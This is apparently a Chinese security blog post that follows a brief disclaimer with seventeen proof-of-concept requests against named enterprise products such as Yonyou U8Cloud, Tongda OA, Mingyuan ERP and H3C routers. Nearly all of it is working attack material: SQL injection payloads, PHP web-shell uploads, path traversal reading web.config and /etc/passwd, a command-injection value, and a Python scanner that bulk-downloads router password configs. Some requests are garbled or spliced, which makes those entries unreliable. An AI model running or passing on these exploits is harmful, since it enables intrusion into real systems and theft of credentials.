免责声明
本文仅用于技术学习和讨论。请勿使用本文所提供的内容及相关技术从事非法活动,由于传播、利用此文所提供的内容或工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果均与文章作者及本账号无关,本次测试仅供学习使用。如有内容争议或侵权,请及时私信我们!我们会立即删除并致歉。谢谢!
一、金慧综合管理信息系统SQL注入漏洞
POST /Portal/LoginBegin.aspx?ReturnUrl=%2f HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Accept: */*
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Todo=Validate&LoginName=1%27+AND+5094+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28120%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%285094%3D5094%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28118%29%2BCHAR%28120%29%2BCHAR%28113%29%29%29+AND+%27JKJg%27%3D%27JKJg&Password=&CDomain=Local&FromUrl=
二、金和 OA C6 GeneralXmlhttpPage.aspx SQL 注入漏洞
GET /C6/Jhsoft.Web.appraise/AppraiseScoreUpdate.aspx/GeneralXmlhttpPage.aspx/?id=%27and%28select%2B1%29%3E0waitfor%2F%2A%2A%2Fdelay%270%3A0%3A4 HTTP/1.1
三、百易云资产管理运营系统任意文件上传
POST /comfileup.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0)Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=--------1110146050
----------1110146050
Content-Disposition: form-data; name="file";filename="rce.php"
<?php system("whoami");unlink(__FILE__);?>
----------1110146050--
四、天问物业ERP系统ContractDownLoad存在任意文件读取漏洞
/HM/M_Main/WorkGeneral/docfileDownLoad.aspx?AdjunctFile=../web.config
五、天问物业 ERP 系统 AreaAvatarDownLoad.aspx 任意文件读取漏洞
/HM/Main/InformationManage/AreaAvatarDownLoad.aspx?AreaAvatar=../web.config HTTP/1.1
六、用友U8Cloud ActionServlet SQL注入
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasQueryConditionFrameAction&method=doCopy&TableSelectedID=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
七、用友 NC UserAuthenticationServlet 反序列化漏洞
POST /servlet/~uapim/nc.bs.pub.im.UserAuthenticationServlet HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/36.0.1985.125 Safari/537.36
Accept-Encoding: gzip
Content-Length:
恶意序列化数据
八、用友U8cloud MeasQueryConditionFrameAction接口SQL注入漏洞
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasQueryConditionFrameAction&method=doCopy&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/113.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
九、WVP视频平台(国标28181)未授权SQL注入漏洞
GET /api/push/list?page=1&count=15&query=1'&pushing=&mediaServerId= HTTP/1.1
Host:
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
十、华磊科技物流getOrderTrackingNumber存在sql注入漏洞
GET /getOrderTrackingNumber.htm?documentCode=1'and%0a1=user::integer-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
十一、通达OA V11.10 login.php SQL注入漏洞
POST /ispirit/interface/login.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; IntelMacOSX10_12_6)AppleWebKit/537.36(KHTML, like Gecko)Chrome/69.0.855.2 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 107
name=123&pass=123&_SERVER[REMOTE_ADDR]=1','10',(select+@`,'`+or+if(1%3d0,1,(select+~0%2b1))+limit+0,1))--+'
十二、创客13星零售商城系统前台任意文件上传漏洞
POST /Login/shangchuan HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 197
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBP56KuZOdlY4nLGg
Host: 127.0.0.1
Origin: http://127.0.0.1
Referer: http://127.0.0.1/Login/shangchuan
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-fetch-user: ?1
------WebKitFormBoundary03rNBzFMIytvpWhy
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/jpeg
<?php phpinfo();?>
------WebKitFormBoundary03rNBzFMIytvpWhy--
十三、明源云ERP接口ApiUpdate.ashx文件上传漏洞
POST /myunke/ApiUpdateTool/ApiUpdate.ashx?apiocode=a HTTP/1.1
Host: target.com
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3)AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 856
{{unquote("PK\x03\x04\x14\x00\x00\x00\x08\x00\xf2\x9a\x0bW\x97\xe9\x8br\x8c\x00\x00\x00\x93\x00\x00\x00\x1e\x00\x00\x00../../../fdccloud/_/check.aspx$\xcc\xcb\x0a\xc20\x14\x04\xd0_\x09\x91B\xbb\x09\x0a\xddH\xab\x29\x8aP\xf0QZ\xc4\xf5m\x18j!ib\x1e\x82\x7fo\xc4\xdd0g\x98:\xdb\xb1\x96F\xb03\xcdcLa\xc3\x0f\x0b\xce\xb2m\x9d\xa0\xd1\xd6\xb8\xc0\xae\xa4\xe1-\xc9d\xfd\xc7\x07h\xd1\xdc\xfe\x13\xd6%0\xb3\x87x\xb8\x28\xe7R\x96\xcbr5\xacyQ\x9d&\x05q\x84B\xea\x7b\xb87\x9c\xb8\x90m\x28<\xf3\x0e\xaf\x08\x1f\xc4\xdd\x28\xb1\x1f\xbcQ1\xe0\x07EQ\xa5\xdb/\x00\x00\x00\xff\xff\x03\x00PK\x01\x02\x14\x03\x14\x00\x00\x00\x08\x00\xf2\x9a\x0bW\x97\xe9\x8br\x8c\x00\x00\x00\x93\x00\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00../../../fdccloud/_/check.aspxPK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00L\x00\x00\x00\xc8\x00\x00\x00\x00\x00")}}
vsoft=kvm&hostType=physical&name=penson&extranet=127.0.0.1%7Ccalc.exe&cpuCores=2&
memory=16&diskSize=16&desc=&uid=640be59da4851&type=za
十四、H3C密码泄露漏洞
import requests
import urllib3
from urllib.parse import urlparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
payload = '/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg'
invalidkey = "home.asp"
with open('target.txt', 'r') as f:
for target in f:
url = target + payload
# print('target:',url)
try:
req = requests.get(url, verify=False)
except:
pass
if req.status_code == 200:
if invalidkey not in req.text:
parsed = urlparse(url)
with open(str(parsed.hostname) + '.' + str(parsed.port) + '.txt', 'w') as w:
w.write(req.text)
w.close()
print('[+] Target: ' + target + ' is Vulnerability'
十五、Bazarr swaggerui组件目录穿越导致任意文件读取漏洞
GET /api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
十六、宏脉医疗DownLoadServerFile任意文件读取下载漏洞
P0ST /zh-CN/PublicInterface/DownLoadServerFile HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
filePath=c:\windows\win.in
十七、科讯校园一卡通管理系统 dormitoryHealthRankingSQL注入漏洞
GET /api/dormitoryHealthRanking?building=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
关注公众号:实战安全研究